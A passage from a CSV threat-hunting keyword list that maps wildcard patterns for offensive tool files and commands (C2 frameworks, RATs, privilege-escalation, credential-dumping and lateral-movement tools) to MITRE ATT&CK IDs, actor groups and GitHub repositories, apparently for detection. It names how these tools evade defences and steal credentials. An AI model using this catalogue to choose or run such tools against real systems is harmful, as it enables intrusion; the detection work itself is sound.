T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 
- FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/darkr4y/geacon,1,1,N/A,10,10,1038,224,2020-10-02T10:34:37Z,2020-02-14T14:01:29Z -*DarkRCovery.exe*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*DarkWidow-main*,offensive_tool_keyword,DarkWidow,Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing,T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140,TA0005 - TA0003 - TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/reveng007/DarkWidow,1,1,N/A,10,3,268,38,2023-08-03T22:37:44Z,2023-07-24T13:59:16Z -*das add -db dbname masscan *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*das add -db dbname rustscan *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*das report 
-hosts 192.168.1.0/24 -oA report2*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*das scan -db dbname -hosts all -oA report1 -nmap '-Pn -sVC -O' -parallel*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*das scan -db dbname -ports 22*80*443*445 -show*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*dashlane2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*data/ipwn*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. 
identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*data/payloads/stager.ps1*,offensive_tool_keyword,ThunderShell,ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.,T1021.002 - T1573.002 - T1001.003,TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Mr-Un1k0d3r/ThunderShell,1,1,N/A,10,10,759,254,2023-03-29T21:57:08Z,2017-09-12T01:11:29Z -*data/shell/backdoors*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,1,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*data/shell/stagers*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,1,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*data/wordlist_256.txt*,offensive_tool_keyword,dnscat2,This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol,T1071.004 - T1102 - T1071.001,TA0002 - TA0003 - 
TA0008,N/A,N/A,C2,https://github.com/iagox86/dnscat2,1,1,N/A,10,10,3077,596,2023-04-26T17:40:22Z,2013-01-04T23:15:55Z -*data/wordlists*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Data\VulnerableCOM.csv*,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,0,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z -*DataSploit*,offensive_tool_keyword,datasploit,Performs OSINT on a domain / email / username / phone and find out information from different sources,T1247 - T1593 - T1271 - T1110 - T1122 - T1123,TA0002 - TA0009,N/A,N/A,Information Gathering,https://github.com/dvopsway/datasploit,1,1,N/A,N/A,3,227,670,2022-12-04T16:02:57Z,2016-05-26T03:34:43Z -*datr=80ZzUfKqDOjwL8pauwqMjHTa*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - 
TA0040,N/A,N/A,Credential Access,https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl,1,0,N/A,7,10,N/A,N/A,N/A,N/A -*DavidXanatos/DiskCryptor*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,1,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z -*DavRelayUp.csproj*,offensive_tool_keyword,DavRelayUp,DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced,T1078 - T1078.004 - T1068,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/ShorSec/DavRelayUp,1,1,N/A,9,5,446,70,2023-06-05T09:17:06Z,2023-06-05T07:49:39Z -*DavRelayUp.exe*,offensive_tool_keyword,DavRelayUp,DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced,T1078 - T1078.004 - T1068,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/ShorSec/DavRelayUp,1,1,N/A,9,5,446,70,2023-06-05T09:17:06Z,2023-06-05T07:49:39Z -*DavRelayUp.sln*,offensive_tool_keyword,DavRelayUp,DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced,T1078 - T1078.004 - T1068,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/ShorSec/DavRelayUp,1,1,N/A,9,5,446,70,2023-06-05T09:17:06Z,2023-06-05T07:49:39Z -*DavRelayUp-master*,offensive_tool_keyword,DavRelayUp,DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced,T1078 - T1078.004 - T1068,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/ShorSec/DavRelayUp,1,1,N/A,9,5,446,70,2023-06-05T09:17:06Z,2023-06-05T07:49:39Z -*dazzleUP.cna*,offensive_tool_keyword,dazzleUP,A tool that detects the privilege escalation vulnerabilities caused 
by misconfigurations and missing updates in the Windows operating systems.,T1068 - T1088 - T1210 - T1210.002,TA0004 - TA0007,N/A,N/A,Privilege Escalation,https://github.com/hlldz/dazzleUP,1,1,N/A,9,5,479,70,2020-07-23T08:48:43Z,2020-07-21T21:06:46Z -*dazzleUP.exe*,offensive_tool_keyword,dazzleUP,A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.,T1068 - T1088 - T1210 - T1210.002,TA0004 - TA0007,N/A,N/A,Privilege Escalation,https://github.com/hlldz/dazzleUP,1,1,N/A,9,5,479,70,2020-07-23T08:48:43Z,2020-07-21T21:06:46Z -*dazzleUP.sln*,offensive_tool_keyword,dazzleUP,A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.,T1068 - T1088 - T1210 - T1210.002,TA0004 - TA0007,N/A,N/A,Privilege Escalation,https://github.com/hlldz/dazzleUP,1,1,N/A,9,5,479,70,2020-07-23T08:48:43Z,2020-07-21T21:06:46Z -*dazzleUP.vcxproj*,offensive_tool_keyword,dazzleUP,A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.,T1068 - T1088 - T1210 - T1210.002,TA0004 - TA0007,N/A,N/A,Privilege Escalation,https://github.com/hlldz/dazzleUP,1,1,N/A,9,5,479,70,2020-07-23T08:48:43Z,2020-07-21T21:06:46Z -*dazzleUP.x32.exe*,offensive_tool_keyword,dazzleUP,A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.,T1068 - T1088 - T1210 - T1210.002,TA0004 - TA0007,N/A,N/A,Privilege Escalation,https://github.com/hlldz/dazzleUP,1,1,N/A,9,5,479,70,2020-07-23T08:48:43Z,2020-07-21T21:06:46Z -*dazzleUP.x64.exe*,offensive_tool_keyword,dazzleUP,A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.,T1068 - T1088 - T1210 - T1210.002,TA0004 - TA0007,N/A,N/A,Privilege 
Escalation,https://github.com/hlldz/dazzleUP,1,1,N/A,9,5,479,70,2020-07-23T08:48:43Z,2020-07-21T21:06:46Z -*dazzleUP_Reflective_DLL*,offensive_tool_keyword,dazzleUP,A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.,T1068 - T1088 - T1210 - T1210.002,TA0004 - TA0007,N/A,N/A,Privilege Escalation,https://github.com/hlldz/dazzleUP,1,1,N/A,9,5,479,70,2020-07-23T08:48:43Z,2020-07-21T21:06:46Z -*dazzleUP-master*,offensive_tool_keyword,dazzleUP,A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.,T1068 - T1088 - T1210 - T1210.002,TA0004 - TA0007,N/A,N/A,Privilege Escalation,https://github.com/hlldz/dazzleUP,1,1,N/A,9,5,479,70,2020-07-23T08:48:43Z,2020-07-21T21:06:46Z -*db2_default_pass.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*db2_default_user.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*DBC2.git*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*dbc2_agent.cs*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*dbc2_agent.exe*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a 
means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*dbc2Loader.dll*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*dbc2Loader.exe*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*dbc2Loader.tpl*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*dbc2LoaderWrapperCLR.*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*dbc2LoaderWrapperCLR_x64.dll*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the 
victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*dbc2LoaderWrapperCLR_x86.dll*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*DBC2-master.zip*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*dBCSPwd*aad3b435b51404eeaad3b435b51404ee*,offensive_tool_keyword,ntdissector,Ntdissector is a tool for parsing records of an NTDS database. 
Records are dumped in JSON format and can be filtered by object class.,T1003.003,TA0006 ,N/A,N/A,Credential Access,https://github.com/synacktiv/ntdissector,1,0,N/A,9,1,73,6,2023-10-03T14:17:00Z,2023-09-05T12:13:47Z -*dbdbnchagbkhknegmhgikkleoogjcfge*,greyware_tool_keyword,Hideman VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*dbGetNimplant*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*dc3d98a8e8c0b0944291f9b462f552f174261982c4507f2de1ee9503353d10e9*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*dccon.exe -encrypt2*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,0,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z -*dcenum.run*,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,0,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z -*dchrastil*,offensive_tool_keyword,Github Username,github user name hosting exploitation tools:hacker. scripting. recon. OSINT. 
automation,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/dchrastil,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*--dc-ip *--check-user-access*,offensive_tool_keyword,FindUncommonShares,FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains,T1135,TA0007,N/A,N/A,Discovery,https://github.com/p0dalirius/FindUncommonShares,1,0,N/A,N/A,4,331,38,2023-10-03T21:49:54Z,2021-10-06T12:30:16Z -*dcipher-cli*,offensive_tool_keyword,dcipher-cli,Crack hashes using online rainbow & lookup table attack services. right from your terminal.,T1110.001 - T1558.003,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/k4m4/dcipher-cli,1,0,N/A,N/A,3,224,30,2023-01-05T16:13:56Z,2018-04-08T18:21:44Z -*dcomexec -*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*dcomexec.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*dcomhijack.cna*,offensive_tool_keyword,dcomhijack,Lateral Movement Using DCOM and DLL Hijacking,T1021 - T1021.003 - T1574 - T1574.007 - T1574.002,TA0008 - TA0005 - TA0002,N/A,N/A,Lateral Movement,https://github.com/WKL-Sec/dcomhijack,1,1,N/A,10,3,228,23,2023-06-18T20:34:03Z,2023-06-17T20:23:24Z -*dcomhijack.py*,offensive_tool_keyword,dcomhijack,Lateral Movement Using DCOM and DLL Hijacking,T1021 - T1021.003 - T1574 - T1574.007 - T1574.002,TA0008 - TA0005 - TA0002,N/A,N/A,Lateral Movement,https://github.com/WKL-Sec/dcomhijack,1,1,N/A,10,3,228,23,2023-06-18T20:34:03Z,2023-06-17T20:23:24Z -*dcomhijack-main*,offensive_tool_keyword,dcomhijack,Lateral Movement Using DCOM and DLL Hijacking,T1021 - T1021.003 - T1574 - T1574.007 - T1574.002,TA0008 - TA0005 - TA0002,N/A,N/A,Lateral Movement,https://github.com/WKL-Sec/dcomhijack,1,1,N/A,10,3,228,23,2023-06-18T20:34:03Z,2023-06-17T20:23:24Z -*DCOMPotato.*,offensive_tool_keyword,DCOMPotato,Service DCOM Object and SeImpersonatePrivilege abuse.,T1548.002 - T1134.002,TA0004 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/zcgonvh/DCOMPotato,1,0,N/A,10,4,326,46,2022-12-09T01:57:53Z,2022-12-08T14:56:13Z -*DCOMPotato-master*,offensive_tool_keyword,DCOMPotato,Service DCOM Object and SeImpersonatePrivilege abuse.,T1548.002 - T1134.002,TA0004 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/zcgonvh/DCOMPotato,1,1,N/A,10,4,326,46,2022-12-09T01:57:53Z,2022-12-08T14:56:13Z -*DCOMReflection.cpp*,offensive_tool_keyword,localpotato,The LocalPotato attack is a type of NTLM reflection attack that 
targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.,T1550.002 - T1078.003 - T1005 - T1070.004,TA0004 - TA0006 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/decoder-it/LocalPotato,1,0,N/A,10,5,463,69,2023-02-12T18:39:49Z,2023-01-04T18:22:29Z -*DcRat 1.0.7*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,0,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*DcRat.7z*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,1,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*DcRat.exe*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,1,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*DcRat.zip*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,1,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*DcRat_png.png*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,1,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*DcRat-main.zip*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,1,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*dcrypt_bartpe.zip*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,1,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z 
-*dcrypt_install.iss*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,1,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z -*dcrypt_setup_*.exe*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,1,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z -*dcrypt_winpe.zip*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,1,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z -*dcsync -Domain*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 